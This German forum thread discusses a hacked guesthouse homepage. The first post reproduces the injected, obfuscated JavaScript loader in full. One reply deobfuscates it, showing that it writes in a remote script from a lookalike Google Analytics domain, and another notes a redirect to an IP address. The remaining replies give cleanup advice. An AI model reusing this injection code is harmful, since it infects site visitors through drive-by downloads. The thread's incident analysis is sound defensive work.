killinator007
Goto Top

Privathomepage einer Pension mit Quelltext manipuliert

Hallo zusammen, so etwas ist mir noch nie untergekommen! Neulich rief mich eine besorgte Frau an und meint, das mit ihrer Homepage etwas nicht stimmt, Zitat: Sie ist komplett verschwunden.

Was aber nicht genz der Fall war, denn es wurde ein schadhafter Quelltext hinterlegt:
<html>
<head>
<title>Pension Stöcklholz - Urlaub am Nationalpark Bayerischer Wald</title>
<META NAME="description" CONTENT="Pension Stöcklholz, Bayerischer Wald. Urlaub in Bayern am Nationalpark Bayrischer Wald. Wellness Familienferien in der Nähe von Grafenau.">
<META NAME="keywords" CONTENT="Pension Stöcklholz, Stöckelholz, Wittensöllner, Grafenau, Urlaub, Ilz, Ilztal, Familienurlaub, Kinder, Tiere, Erholung, Entspannung, Ferienwohnung, Doppelzimmer, Einzelzimmer, Nationalpark, Bayerischer Wald, Niederbayern, Hotel, Bayern, Bayerwald, bayrisch, Familie, Hallenbad, Haidelregion, Ostbayern, Bayern, Deutschland, Erholung, Kinderfreundlich, Freyung, Kinderspielplatz, Kinderspielzimmer, Bayrischer, Nationalpark Bayerischer Wald, Naturpark Bayerischer Wald, Radfahren, Radwandern, Urlaub, Reisen, Ferien, wandern, Ski, skifahren, Langlauf, Donau, Dreisessel, Arber, Rachel, Lusen, Böhmen, Böhmerwald, Tschechien, Passau, Passauer Land, Freibad, Loipe, reiten, Naturpark, bayerisch, Urlaub, Wandern, Unterkunft, Unterkünfte, Freizeit, Ferienhaus, Ferienhäuser, Grafenau, Ferienunterkunft, Ferienunterkünfte, Reiseunterkunft, Reiseunterkünfte, Urlaubsunterkunft, Urlaubsunterkünfte, Naturpark, bavarian forest, Last Minute Angebote, Pauschalangebot, Pauschalangebote, Last-Minute-Angebote, Familien, Familienferien">
<!--4c7246f9c070710deb5de104810e46ca-><script language=javascript>pgwnl="%";xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>";fsb=unescape(xlbpi.replace(/Y/g,pgwnl));var hvx,qm;document.write(fsb);hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">=";ckzoq(hvx);</script>

Da ich mich mit Websiteprogrammierung nicht auskenne, bzw. nur den Grundriss weiß, möchte ich hier mehr erfahren. Ich denke hier kennt sich jemand aus. Wie kann so etwas denn nur passieren?

MfG Michael

Content-ID: 88892

Url: https://administrator.de/forum/privathomepage-einer-pension-mit-quelltext-manipuliert-88892.html

Ausgedruckt am: 23.12.2024 um 00:12 Uhr

kaffeezombie
kaffeezombie 02.06.2008 um 10:47:22 Uhr
Goto Top
Du hast doch gar kein body!!!

Es ist gar kein Inhalt deklariert, somit kann auch nix angezeigt werden
Jere
Jere 02.06.2008 um 11:02:52 Uhr
Goto Top
Die Website ist ja noch immer blank?
Fahre das letzte Backup ein und ändere alle Passwörter.
Kontrolliere, ob vertrauliche Daten in anderen Besitz übergegangen sein könnten.
Danach kannst du immernoch auswerten.


Das JS sagt mir nicht, kenne weder pgwnl noch xlbpi.
Und der Aufbau schaut auch sehr willkürlich aus.
(Die Sache mit dem Body ist auch so eine Sache *grübel*)


@kaffeezombie: Was für ein geiler Nick! :D :D
kaffeezombie
kaffeezombie 02.06.2008 um 11:13:09 Uhr
Goto Top
meine User gaben mir diesen Namen... sie haben eine gute beobachtunggabe face-wink)
killinator007
killinator007 02.06.2008 um 11:55:46 Uhr
Goto Top
Hallo, das Script funktioniert anscheinend nicht immer! mir wurde die installation eines ActiveX Steuerelementes angezeigt, welches eine Art Trojaner enthält. Diese Seiten sind eh schon bekannt mit den Texten "Auf ihren PC wurde Spyware entdeckt, bla,bla"
LordGurke
LordGurke 02.06.2008 um 12:09:54 Uhr
Goto Top
Beim ersten Aufruf der Seite wurde ich auch auf http://58.65.234.163/e/count.php weitergeleitet - vermutlich durch das ominöse Script, weshalb vermutlich auch kein body-Tag mehr da ist, damit die Weiterleitung reibungslos funktioniert.

Irgendwer hat deine FTP-Zugangsdaten benutzt und die Seite entsprechend manipuliert.
Arano
Arano 02.06.2008 um 13:20:24 Uhr
Goto Top
Ich war neugierig und habe mir das Skript mal angesehen und "auseinander" genommen.
<script language=javascript>
  pgwnl="%";  
  xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>";  
  fsb=unescape(xlbpi.replace(/Y/g,pgwnl));
  var hvx,qm;
  //document.write(fsb);
  alert(fsb);
  hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">=";  
  
  ckzoq(hvx);
  
  
  
  
  // xlbpi bzw. fsb =
  function ckzoq(pot){
           var ah,
               k  ="(*CcvGq-m$.kyZOsVIH8[puF}&@#T`;t\"763]_i'JUzwA+Mn1^EN5xal2o:!bPBhe{rdf|)K =0jg9~4,",  
               a  ="",  
               gbk,
               ru,
               tza="",  
               db;
           for(ah=0;ah<pot.length;ah++){
               gbk=pot.charAt(ah);
               ru =k.indexOf(gbk);
               if(ru>-1){
                  db=((ru+1)%81-1);
                  if(db<=0)
                     db+=81;
                  tza+=k.charAt(db-1);
                  }
                  else tza+=gbk;
               }
           a+=tza;
           //document.write(a);
           alert(a);
           }
           
           
  // ckzoq(hvx) =
  document.write( "<SCRIPT language=\"JavaScript\" SRC=\"http://www.googleanalitics.net/__utb.js?"+document.referrer+"\"><\/SCRIPT>" );   
  
</script>
Zuerst werden alle "Y" die in der Variable xlbpi enthalten sind durch "%" ersetzt, danach wird der Inhalt unescapt und ergibt den JS-Code für die Funktion ckzog() die anschließend in das Dokument geschrieben wird (inkl. <script>-tags).
Mithilfe dieser Funktion wird dann der Inhalt der Variable hvx decodiert und ebenfalls in das Dokument geschrieben was zufolge hat, dass das Javascript von der angegebenen Adresse (die einer Suchmaschine __ähnelt__) eingebunden wird.

Also definitive Schadcode ! (wurde ja auch schon erwähnt)

Wahrscheinlich hat Maxi89 recht und da hat jemand deinen FTP-Account geknackt oder sich sonst wie Zugang zu deinem Webspace verschafft.

Wenn du kannst, schau die mal die Log-Dateien des FTP- und Webservers an, möglicherweise findest du Hinweise und Spuren dazu wie derjenige sich Zugang verschaffen konnte.

~Arano
filippg
filippg 02.06.2008 um 19:36:41 Uhr
Goto Top
Hallo,

es ist nicht schön Kundendaten im Internet preiszugeben.

Gruß

Filipp
killinator007
killinator007 03.06.2008 um 12:03:22 Uhr
Goto Top
Wer gibt heir Kundendaten preis? Es ist eine öffentliche Website!

Gruß Michael
killinator007
killinator007 03.06.2008 um 12:18:42 Uhr
Goto Top
Danke für deine Mühe, dass Script zu zerlegen! ich gehe auch davon aus, das der FTP Account geknackt wurde.

Ist hald ärgerlich

Gruß

Michael
filippg
filippg 03.06.2008 um 20:50:40 Uhr
Goto Top
Hallo,

du hast Preisgegeben, dass diese Website nicht professionell betrieben wird, und dass es hier offensichtlich ein Sicherheitsproblem gab (oder wahrscheinlich noch gibt).
Deine Telefonnummer steht auch im öffentlichen Telefonbuch, und wahrscheinlich lässt sich irgendwo auch deine eMail-Adresse nachlesen. Trotzdem fändest du es bestimmt nicht toll, wenn ich das beides jetzt hier posten würde (oder noch an einer dritten Stelle, mit der du gar nichts zu tun hast).

Gruß

Filipp
killinator007
killinator007 03.06.2008 um 23:31:38 Uhr
Goto Top
Hi Filipp

was dass mit der Website betrifft hasr du recht, nur, was nützt dir das? Das du irgendwie an meine E-mail Adresse kommen kannst und meinen Namen evtl. im Telefonbuch findest, naja kann doch sein. Außerdem bekomme ich schon genug SPAM ;) Nein, näturlich möchte das nicht unbedingt jeder.

Ich werde nächstes mal keine personenbezogene Daten mehr Posten (war so nicht richtig), auch wenn es grundsätzlich eine öffentliche Website ist und ich weder Zugang noch Passwort gesendet habe!

Sorry

Gruß

Michael